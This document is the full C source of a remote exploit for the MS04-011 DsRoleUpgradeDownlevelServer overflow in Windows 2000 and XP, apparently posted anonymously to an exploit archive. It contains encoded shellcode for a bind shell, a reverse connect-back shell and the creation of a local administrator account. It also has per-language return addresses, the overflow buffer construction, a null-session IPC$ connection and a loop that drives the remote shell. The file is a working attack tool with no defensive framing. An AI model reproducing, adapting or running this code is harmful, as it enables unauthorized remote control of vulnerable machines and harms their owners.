MS04-011 DsRoleUpgradeDownlevelServer remote exploit. Submitted anonymously.
c345e1ceaf031691148d79a9fafffd9b68fdbe6f2ffeb4b7ad70da3edd68b5fe
/*
* MS04-011 DsRoleUpgradeDownlevelServer Remote Exploit
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "mpr.lib")
#define WIN2K 0
#define WINXP 1
struct target
{
char *desc;
int os_type;
int retaddr;
};
/*
* on Win2k we use a call edi in netrap.dll,
* on WinXP we use a jmp esp in samsrv.dll.
*/
struct target tt[] =
{
{ "Win2k en", WIN2K, 0x751c1152 },
{ "Win2k fr", WIN2K, 0x75141152 },
{ "WinXP en", WINXP, 0x7448f9cb },
{ "WinXP fr", WINXP, 0x743ff9cb }
};
int ttnum = 4;
/* basic alpha shellcode decoder that passes through unicode api */
unsigned char shell_decode[] = {
0xeb, 0x23, 0x5e, 0x56, 0x5f, 0x81, 0xc7, 0x02, 0xd1, 0xff, 0xff, 0x57,
0x31, 0xd2, 0x4a, 0x4a, 0x4a, 0xac, 0x2c, 0x41, 0x50, 0x59, 0xac, 0x2c,
0x41, 0xc0, 0xe0, 0x04, 0x08, 0xc8, 0xaa, 0x39, 0x57, 0xfc, 0x75, 0xed,
0xc3, 0xe8, 0xd8, 0xff, 0xff, 0xff
};
/* thanks to metasploit.org for their shellcodes */
/* -modified to call ExitThread, not ExitProcess */
/* note : end mark = 0xFFFFFFFD (must be unique) */
unsigned char win32_bind[] = {
0xe8, 0x38, 0x00, 0x00, 0x00, 0x43, 0x4d, 0x44, 0x00, 0xe7, 0x79, 0xc6,
0x79, 0xe5, 0x49, 0x86, 0x49, 0xa4, 0xad, 0x2e, 0xe9, 0xa4, 0x1a, 0x70,
0xc7, 0xd9, 0x09, 0xf5, 0xad, 0xcb, 0xed, 0xfc, 0x3b, 0x8e, 0x4e, 0x0e,
0xec, 0xef, 0xce, 0xe0, 0x60, 0xad, 0xd9, 0x05, 0xce, 0x72, 0xfe, 0xb3,
0x16, 0x57, 0x53, 0x32, 0x5f, 0x33, 0x32, 0x2e, 0x44, 0x4c, 0x4c, 0x00,
0x01, 0x5b, 0x54, 0x89, 0xe5, 0x89, 0x5d, 0x00, 0x6a, 0x30, 0x59, 0x64,
0x8b, 0x01, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x1c, 0xad, 0x8b, 0x58, 0x08,
0xeb, 0x0c, 0x8d, 0x57, 0x2c, 0x51, 0x52, 0xff, 0xd0, 0x89, 0xc3, 0x59,
0xeb, 0x10, 0x6a, 0x08, 0x5e, 0x01, 0xee, 0x6a, 0x0a, 0x59, 0x8b, 0x7d,
0x00, 0x80, 0xf9, 0x06, 0x74, 0xe4, 0x51, 0x53, 0xff, 0x34, 0x8f, 0xe8,
0x90, 0x00, 0x00, 0x00, 0x59, 0x89, 0x04, 0x8e, 0xe2, 0xeb, 0x31, 0xff,
0x66, 0x81, 0xec, 0x90, 0x01, 0x54, 0x68, 0x01, 0x01, 0x00, 0x00, 0xff,
0x55, 0x20, 0x57, 0x57, 0x57, 0x57, 0x47, 0x57, 0x47, 0x57, 0xff, 0x55,
0x1c, 0x89, 0xc3, 0x31, 0xff, 0x57, 0x57, 0x68, 0x02, 0x00, 0x22, 0x11,
0x89, 0xe6, 0x6a, 0x10, 0x56, 0x53, 0xff, 0x55, 0x18, 0x57, 0x53, 0xff,
0x55, 0x14, 0x57, 0x56, 0x53, 0xff, 0x55, 0x10, 0x89, 0xc2, 0x66, 0x81,
0xec, 0x54, 0x00, 0x8d, 0x3c, 0x24, 0x31, 0xc0, 0x6a, 0x15, 0x59, 0xf3,
0xab, 0x89, 0xd7, 0xc6, 0x44, 0x24, 0x10, 0x44, 0xfe, 0x44, 0x24, 0x3d,
0x89, 0x7c, 0x24, 0x48, 0x89, 0x7c, 0x24, 0x4c, 0x89, 0x7c, 0x24, 0x50,
0x8d, 0x44, 0x24, 0x10, 0x54, 0x50, 0x51, 0x51, 0x51, 0x41, 0x51, 0x49,
0x51, 0x51, 0xff, 0x75, 0x00, 0x51, 0xff, 0x55, 0x30, 0x89, 0xe1, 0x68,
0xff, 0xff, 0xff, 0xff, 0xff, 0x31, 0xff, 0x55, 0x2c, 0x57, 0xff, 0x55,
0x0c, 0xff, 0x55, 0x28, 0x53, 0x55, 0x56, 0x57, 0x8b, 0x6c, 0x24, 0x18,
0x8b, 0x45, 0x3c, 0x8b, 0x54, 0x05, 0x78, 0x01, 0xea, 0x8b, 0x4a, 0x18,
0x8b, 0x5a, 0x20, 0x01, 0xeb, 0xe3, 0x32, 0x49, 0x8b, 0x34, 0x8b, 0x01,
0xee, 0x31, 0xff, 0xfc, 0x31, 0xc0, 0xac, 0x38, 0xe0, 0x74, 0x07, 0xc1,
0xcf, 0x0d, 0x01, 0xc7, 0xeb, 0xf2, 0x3b, 0x7c, 0x24, 0x14, 0x75, 0xe1,
0x8b, 0x5a, 0x24, 0x01, 0xeb, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c,
0x01, 0xeb, 0x8b, 0x04, 0x8b, 0x01, 0xe8, 0xeb, 0x02, 0x31, 0xc0, 0x89,
0xea, 0x5f, 0x5e, 0x5d, 0x5b, 0xc2, 0x08, 0x00,
0xfd, 0xff, 0xff, 0xff
};
unsigned char win32_reverse[] = {
0xe8, 0x30, 0x00, 0x00, 0x00, 0x43, 0x4d, 0x44, 0x00, 0xe7, 0x79, 0xc6,
0x79, 0xec, 0xf9, 0xaa, 0x60, 0xd9, 0x09, 0xf5, 0xad, 0xcb, 0xed, 0xfc,
0x3b, 0x8e, 0x4e, 0x0e, 0xec, 0xef, 0xce, 0xe0, 0x60, 0xad, 0xd9, 0x05,
0xce, 0x72, 0xfe, 0xb3, 0x16, 0x57, 0x53, 0x32, 0x5f, 0x33, 0x32, 0x2e,
0x44, 0x4c, 0x4c, 0x00, 0x01, 0x5b, 0x54, 0x89, 0xe5, 0x89, 0x5d, 0x00,
0x6a, 0x30, 0x59, 0x64, 0x8b, 0x01, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x1c,
0xad, 0x8b, 0x58, 0x08, 0xeb, 0x0c, 0x8d, 0x57, 0x24, 0x51, 0x52, 0xff,
0xd0, 0x89, 0xc3, 0x59, 0xeb, 0x10, 0x6a, 0x08, 0x5e, 0x01, 0xee, 0x6a,
0x08, 0x59, 0x8b, 0x7d, 0x00, 0x80, 0xf9, 0x04, 0x74, 0xe4, 0x51, 0x53,
0xff, 0x34, 0x8f, 0xe8, 0x83, 0x00, 0x00, 0x00, 0x59, 0x89, 0x04, 0x8e,
0xe2, 0xeb, 0x31, 0xff, 0x66, 0x81, 0xec, 0x90, 0x01, 0x54, 0x68, 0x01,
0x01, 0x00, 0x00, 0xff, 0x55, 0x18, 0x57, 0x57, 0x57, 0x57, 0x47, 0x57,
0x47, 0x57, 0xff, 0x55, 0x14, 0x89, 0xc3, 0x31, 0xff, 0x68, 0xc0, 0xa8,
0x00, 0xf7, 0x68, 0x02, 0x00, 0x22, 0x11, 0x89, 0xe1, 0x6a, 0x10, 0x51,
0x53, 0xff, 0x55, 0x10, 0x85, 0xc0, 0x75, 0x44, 0x8d, 0x3c, 0x24, 0x31,
0xc0, 0x6a, 0x15, 0x59, 0xf3, 0xab, 0xc6, 0x44, 0x24, 0x10, 0x44, 0xfe,
0x44, 0x24, 0x3d, 0x89, 0x5c, 0x24, 0x48, 0x89, 0x5c, 0x24, 0x4c, 0x89,
0x5c, 0x24, 0x50, 0x8d, 0x44, 0x24, 0x10, 0x54, 0x50, 0x51, 0x51, 0x51,
0x41, 0x51, 0x49, 0x51, 0x51, 0xff, 0x75, 0x00, 0x51, 0xff, 0x55, 0x28,
0x89, 0xe1, 0x68, 0xff, 0xff, 0xff, 0xff, 0xff, 0x31, 0xff, 0x55, 0x24,
0x57, 0xff, 0x55, 0x0c, 0xff, 0x55, 0x20, 0x53, 0x55, 0x56, 0x57, 0x8b,
0x6c, 0x24, 0x18, 0x8b, 0x45, 0x3c, 0x8b, 0x54, 0x05, 0x78, 0x01, 0xea,
0x8b, 0x4a, 0x18, 0x8b, 0x5a, 0x20, 0x01, 0xeb, 0xe3, 0x32, 0x49, 0x8b,
0x34, 0x8b, 0x01, 0xee, 0x31, 0xff, 0xfc, 0x31, 0xc0, 0xac, 0x38, 0xe0,
0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xeb, 0xf2, 0x3b, 0x7c, 0x24,
0x14, 0x75, 0xe1, 0x8b, 0x5a, 0x24, 0x01, 0xeb, 0x66, 0x8b, 0x0c, 0x4b,
0x8b, 0x5a, 0x1c, 0x01, 0xeb, 0x8b, 0x04, 0x8b, 0x01, 0xe8, 0xeb, 0x02,
0x31, 0xc0, 0x89, 0xea, 0x5f, 0x5e, 0x5d, 0x5b, 0xc2, 0x08, 0x00,
0xfd, 0xff, 0xff, 0xff
};
unsigned char win32_adduser[] = {
0x66, 0x81, 0xec, 0x80, 0x00, 0x89, 0xe6, 0xe8, 0xb7, 0x00, 0x00, 0x00,
0x89, 0x06, 0x89, 0xc3, 0x53, 0x68, 0xef, 0xce, 0xe0, 0x60, 0xe8, 0xbd,
0x00, 0x00, 0x00, 0x89, 0x46, 0x0c, 0x53, 0x68, 0x8e, 0x4e, 0x0e, 0xec,
0xe8, 0xaf, 0x00, 0x00, 0x00, 0x89, 0x46, 0x08, 0x31, 0xdb, 0x53, 0x68,
0x70, 0x69, 0x33, 0x32, 0x68, 0x6e, 0x65, 0x74, 0x61, 0x54, 0xff, 0xd0,
0x89, 0x46, 0x04, 0x89, 0xc3, 0x53, 0x68, 0x5e, 0xdf, 0x7c, 0xcd, 0xe8,
0x8c, 0x00, 0x00, 0x00, 0x89, 0x46, 0x10, 0x53, 0x68, 0xd7, 0x3d, 0x0c,
0xc3, 0xe8, 0x7e, 0x00, 0x00, 0x00, 0x89, 0x46, 0x14, 0x31, 0xc0, 0x31,
0xdb, 0x43, 0x50, 0x68, 0x72, 0x00, 0x73, 0x00, 0x68, 0x74, 0x00, 0x6f,
0x00, 0x68, 0x72, 0x00, 0x61, 0x00, 0x68, 0x73, 0x00, 0x74, 0x00, 0x68,
0x6e, 0x00, 0x69, 0x00, 0x68, 0x6d, 0x00, 0x69, 0x00, 0x68, 0x41, 0x00,
0x64, 0x00, 0x89, 0x66, 0x1c, 0x50, 0x68, 0x58, 0x00, 0x00, 0x00, 0x89,
0xe1, 0x89, 0x4e, 0x18, 0x68, 0x00, 0x00, 0x5c, 0x00, 0x50, 0x53, 0x50,
0x50, 0x53, 0x50, 0x51, 0x51, 0x89, 0xe1, 0x50, 0x54, 0x51, 0x53, 0x50,
0xff, 0x56, 0x10, 0x8b, 0x4e, 0x18, 0x49, 0x49, 0x51, 0x89, 0xe1, 0x6a,
0x01, 0x51, 0x6a, 0x03, 0xff, 0x76, 0x1c, 0x6a, 0x00, 0xff, 0x56, 0x14,
0xff, 0x56, 0x0c, 0x56, 0x6a, 0x30, 0x59, 0x64, 0x8b, 0x01, 0x8b, 0x40,
0x0c, 0x8b, 0x70, 0x1c, 0xad, 0x8b, 0x40, 0x08, 0x5e, 0xc2, 0x04, 0x00,
0x53, 0x55, 0x56, 0x57, 0x8b, 0x6c, 0x24, 0x18, 0x8b, 0x45, 0x3c, 0x8b,
0x54, 0x05, 0x78, 0x01, 0xea, 0x8b, 0x4a, 0x18, 0x8b, 0x5a, 0x20, 0x01,
0xeb, 0xe3, 0x32, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xee, 0x31, 0xff, 0xfc,
0x31, 0xc0, 0xac, 0x38, 0xe0, 0x74, 0x07, 0xc1, 0xcf, 0x0d, 0x01, 0xc7,
0xeb, 0xf2, 0x3b, 0x7c, 0x24, 0x14, 0x75, 0xe1, 0x8b, 0x5a, 0x24, 0x01,
0xeb, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x01, 0xeb, 0x8b, 0x04,
0x8b, 0x01, 0xe8, 0xeb, 0x02, 0x31, 0xc0, 0x89, 0xea, 0x5f, 0x5e, 0x5d,
0x5b, 0xc2, 0x08, 0x00,
0xfd, 0xff, 0xff, 0xff
};
char usage[] =
" usage: progname <shellcode type> <target> <hostname>\n"
" [connect-back ip] [connect-back port]\n"
"\n"
"example: progname 0 2 192.168.1.10\n"
" progname 1 2 192.168.1.10 192.168.1.4 4000\n"
"\n"
"available shellcode types:\n"
"\n"
"0 = bind a port on target\n"
"1 = reverse connect (must specify ip/port)\n"
"2 = create local admin (X/X)\n"
"\n"
"available targets:\n"
"\n";
typedef int (_stdcall *LPFUNC)();
LPFUNC DsRoleUpgradeDownlevelServer;
struct options
{
int sctype;
int target;
char *hostname;
unsigned short port;
}
opt;
int launch_sploit( char *buf_ovflow,
char *buf_target );
int wait_for_shell( void );
int got_shell = 0;
int main( int argc, char *argv[] )
{
HINSTANCE hNETAPI32;
NETRESOURCE netResource;
OSVERSIONINFO osVer;
char buf_tmp[4096];
char buf_target[512];
char buf_ovflow[8192];
unsigned char *p;
int i, thread_id;
printf( "\n" );
if( argc != 4 && argc != 6 )
{
usage:
printf( usage );
for( i = 0; i < ttnum; i++ )
printf( "%d : %s\n", i, tt[i].desc );
printf( "\n" );
return( 1 );
}
sscanf( argv[1], "%d", &opt.sctype );
sscanf( argv[2], "%d", &opt.target );
opt.hostname = argv[3];
if( opt.sctype < 0 || opt.sctype > 2 )
goto usage;
if( ( opt.sctype != 1 && argc != 4 ) ||
( opt.sctype == 1 && argc != 6 ) )
goto usage;
if( opt.target < 0 || opt.target >= ttnum )
goto usage;
memset( buf_tmp, 0, sizeof( buf_tmp ) );
memset( buf_tmp, 'A', 2241 );
memcpy( buf_tmp + 512, shell_decode, sizeof( shell_decode ) );
p = (char *) ((int) buf_tmp + 512 + sizeof( shell_decode ));
if( opt.sctype == 0 )
{
srand( GetTickCount() );
opt.port = rand() % 32767 + 32768;
win32_bind[166] = opt.port >> 8;
win32_bind[167] = opt.port & 0xFF;
for( i = 0; i < sizeof( win32_bind ); i++ )
{
*p++ = 0x41 + ( win32_bind[i] & 0x0F );
*p++ = 0x41 + ( win32_bind[i] >> 4 );
}
}
if( opt.sctype == 1 )
{
int p1, p2, p3, p4;
p1 = p2 = p3 = p4 = 0;
sscanf( argv[4], "%d.%d.%d.%d",
&p1, &p2, &p3, &p4 );
win32_reverse[154] = p1 & 0xFF;
win32_reverse[155] = p2 & 0xFF;
win32_reverse[156] = p3 & 0xFF;
win32_reverse[157] = p4 & 0xFF;
sscanf( argv[5], "%hu", &opt.port );
win32_reverse[161] = opt.port >> 8;
win32_reverse[162] = opt.port & 0xFF;
for( i = 0; i < sizeof( win32_reverse ); i++ )
{
*p++ = 0x41 + ( win32_reverse[i] & 0x0F );
*p++ = 0x41 + ( win32_reverse[i] >> 4 );
}
}
if( opt.sctype == 2 )
{
for( i = 0; i < sizeof( win32_adduser ); i++ )
{
*p++ = 0x41 + ( win32_adduser[i] & 0x0F );
*p++ = 0x41 + ( win32_adduser[i] >> 4 );
}
}
memset( buf_ovflow, 0, sizeof( buf_ovflow ) );
printf( " [+] Retaddr = 0x%08X (%s)\n",
tt[opt.target].retaddr,
tt[opt.target].desc );
if( tt[opt.target].os_type == WIN2K )
{
int retaddr, len_eip, len_edi;
retaddr = tt[opt.target].retaddr;
len_eip = 2024;
len_edi = 2104;
buf_tmp[len_eip - 4] = (unsigned char) ( retaddr >> 0 );
buf_tmp[len_eip - 3] = (unsigned char) ( retaddr >> 8 );
buf_tmp[len_eip - 2] = (unsigned char) ( retaddr >> 16 );
buf_tmp[len_eip - 1] = (unsigned char) ( retaddr >> 24 );
buf_tmp[len_edi + 0] = (unsigned char) 0xE8;
buf_tmp[len_edi + 1] = (unsigned char) 0xC3;
buf_tmp[len_edi + 2] = (unsigned char) 0xF8;
buf_tmp[len_edi + 3] = (unsigned char) 0xFF;
buf_tmp[len_edi + 4] = (unsigned char) 0xFF;
MultiByteToWideChar( CP_ACP, 0, buf_tmp, strlen( buf_tmp ),
(unsigned short *) buf_ovflow, sizeof( buf_ovflow ) );
}
if( tt[opt.target].os_type == WINXP )
{
int retaddr, len_eip, len_esp;
retaddr = tt[opt.target].retaddr;
len_eip = 1968;
len_esp = 1981;
buf_tmp[len_eip - 4] = (unsigned char) ( retaddr >> 0 );
buf_tmp[len_eip - 3] = (unsigned char) ( retaddr >> 8 );
buf_tmp[len_eip - 2] = (unsigned char) ( retaddr >> 16 );
buf_tmp[len_eip - 1] = (unsigned char) ( retaddr >> 24 );
buf_tmp[len_esp + 0] = (unsigned char) 0xE8;
buf_tmp[len_esp + 1] = (unsigned char) 0x3E;
buf_tmp[len_esp + 2] = (unsigned char) 0xF9;
buf_tmp[len_esp + 3] = (unsigned char) 0xFF;
buf_tmp[len_esp + 4] = (unsigned char) 0xFF;
memcpy( buf_ovflow, buf_tmp, strlen( buf_tmp ) );
}
printf( " [+] Attempting to connect to \\ipc$\n" );
sprintf( buf_tmp, "\\\\%s\\ipc$", opt.hostname );
netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName = buf_tmp;
if( WNetAddConnection2( &netResource, "", "", 0 ) )
{
printf( " [!] Create NULL session failed\n" );
//return( 1 );
}
hNETAPI32 = LoadLibrary( "NETAPI32.dll" );
if( ! hNETAPI32 )
{
printf( " [-] LoadLibrary(NETAPI32) failed\n" );
return( 1 );
}
DsRoleUpgradeDownlevelServer = (LPFUNC) GetProcAddress(
hNETAPI32, "DsRoleUpgradeDownlevelServer" );
if( ! DsRoleUpgradeDownlevelServer )
{
printf( " [-] GetProcAddress(DsRole...) failed\n" );
return( 1 );
}
printf( " [+] Patching DsRoleUpgradeDownlevelServer\n" );
if( ! VirtualProtect( DsRoleUpgradeDownlevelServer,
0x1000, PAGE_READWRITE, &i ) )
{
printf( " [-] VirtualProtect(PAGE_READWRITE) failed\n" );
return( 1 );
}
osVer.dwOSVersionInfoSize = sizeof( osVer );
if( ! GetVersionEx( &osVer ) )
{
printf( " [-] GetVersionEx failed\n" );
return( 1 );
}
if( osVer.dwMajorVersion != 5 ||
( osVer.dwMinorVersion != WIN2K &&
osVer.dwMinorVersion != WINXP ) )
{
printf( " [-] Run me on Win2k or WinXP\n" );
return( 1 );
}
p = (unsigned char *) DsRoleUpgradeDownlevelServer;
for( i = 0; i < 128; i++ )
{
if( osVer.dwMinorVersion == WIN2K &&
p[0] == 0x6A &&
p[1] == 0x00 &&
p[2] == 0xE8 )
{
p[0] = 0x90;
p[1] = 0x52;
break;
}
if( osVer.dwMinorVersion == WINXP &&
p[0] == 0x50 &&
p[1] == 0x56 &&
p[2] == 0xE8 )
{
p[1] = 0x52;
break;
}
p++;
}
if( i == 128 )
{
printf( " [-] Could not patch DsRole(etc.)\n" );
return( 1 );
}
memset( buf_target, 0, sizeof( buf_target ) );
MultiByteToWideChar( CP_ACP, 0, opt.hostname, strlen( opt.hostname ),
(unsigned short *) buf_target, sizeof( buf_target ) );
if( ! CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)
wait_for_shell, NULL, 0, &thread_id ) )
{
printf( " [-] CreateThread failed\n" );
return( 1 );
}
printf( " [+] Sending overflow buffer...\n" );
if( opt.sctype == 1 ) Sleep( 1500 );
launch_sploit( buf_ovflow, buf_target );
Sleep( 1500 );
TerminateThread( (HANDLE) thread_id, 0 );
if( ! got_shell && opt.sctype != 2 )
{
printf( " [-] Shit happens, run me again ?\n" );
return( 1 );
}
if( opt.sctype == 2 )
{
printf( " [?] Sploit might have succeeded\n" );
return( 2 );
}
return( 0 );
}
int launch_sploit( char *buf_ovflow, char *buf_target )
{
int err;
char *buf_filler;
buf_filler = "A\0A\0\0\0";
__asm
{
mov eax, buf_filler
mov ecx, 11
pushargs:
push eax
loop pushargs
mov ecx, buf_ovflow
mov edx, buf_target
push ecx
call DsRoleUpgradeDownlevelServer
mov err, eax
}
return( err );
}
int wait_for_shell( void )
{
WSADATA wsa;
HANDLE _stdin;
HANDLE _stdout;
INPUT_RECORD rec;
char buffer[4096];
int i, n, shell_fd;
struct hostent *hostip;
struct sockaddr_in shell_addr;
if( WSAStartup( MAKEWORD( 1, 1 ), &wsa ) )
{
printf( " [-] WSAStartup failed\n" );
return( 1 );
}
if( opt.sctype == 0 )
{
if( ( hostip = gethostbyname( opt.hostname ) ) == NULL )
{
printf( " [-] gethostbyname(%s) failed\n", opt.hostname );
return( 1 );
}
memcpy( (void *) &shell_addr.sin_addr,
(void *) hostip->h_addr, 4 );
shell_addr.sin_family = AF_INET;
shell_addr.sin_port = htons( opt.port );
shell_fd = SOCKET_ERROR;
while( shell_fd == SOCKET_ERROR )
{
shell_fd = socket( AF_INET, SOCK_STREAM, 0 );
if( shell_fd == SOCKET_ERROR )
{
printf( " [-] socket() failed\n" );
return( 1 );
}
if( connect( shell_fd, (const struct sockaddr *) &shell_addr,
sizeof( struct sockaddr_in ) ) < 0 )
{
closesocket( shell_fd );
shell_fd = SOCKET_ERROR;
Sleep( 500 );
}
}
}
if( opt.sctype == 1 )
{
shell_fd = socket( AF_INET, SOCK_STREAM, 0 );
if( shell_fd == SOCKET_ERROR )
{
printf( " [-] socket() failed\n\n" );
return( 1 );
}
shell_addr.sin_family = AF_INET;
shell_addr.sin_port = htons( opt.port );
shell_addr.sin_addr.s_addr = INADDR_ANY;
if( bind( shell_fd, (struct sockaddr *) &shell_addr,
sizeof( struct sockaddr_in ) ) < 0 )
{
printf( " [-] bind() failed\n" );
return( 1 );
}
if( listen( shell_fd, 5 ) < 0 )
{
printf( " [-] listen() failed\n" );
return( 1 );
}
i = sizeof( shell_addr );
n = accept( shell_fd, (struct sockaddr *) &shell_addr, &i );
if( n == SOCKET_ERROR )
{
printf( " [-] accept() failed\n" );
return( 1 );
}
closesocket( shell_fd );
shell_fd = n;
}
if( opt.sctype == 2 )
{
return( 0 );
}
got_shell = 1;
_stdin = GetStdHandle( STD_INPUT_HANDLE );
_stdout = GetStdHandle( STD_OUTPUT_HANDLE );
SetConsoleMode( _stdin, ENABLE_LINE_INPUT |
ENABLE_ECHO_INPUT |
ENABLE_PROCESSED_INPUT );
printf( " [+] Connected to shell, enjoy.\n\n" );
Sleep( 1000 );
while( 1 )
{
Sleep( 10 );
ioctlsocket( shell_fd, FIONREAD, &n );
if( n )
{
n = recv( shell_fd, buffer, sizeof( buffer ), 0 );
if( n == 0 ) break;
if( n == SOCKET_ERROR )
{
printf( " [-] recv() failed\n" );
return( 1 );
}
WriteConsole( _stdout, buffer, n, &i, NULL );
}
PeekConsoleInput( _stdin, &rec, 1, &n );
if( n )
{
if( rec.EventType != KEY_EVENT )
{
ReadConsoleInput( _stdin, &rec, 1, &n );
continue;
}
ReadConsole( _stdin, buffer, sizeof( buffer ), &n, NULL );
if( send( shell_fd, buffer, n, 0 ) == SOCKET_ERROR )
{
printf( " [-] send() failed\n" );
return( 1 );
}
}
}
/* hasta luego... */
return( 0 );
}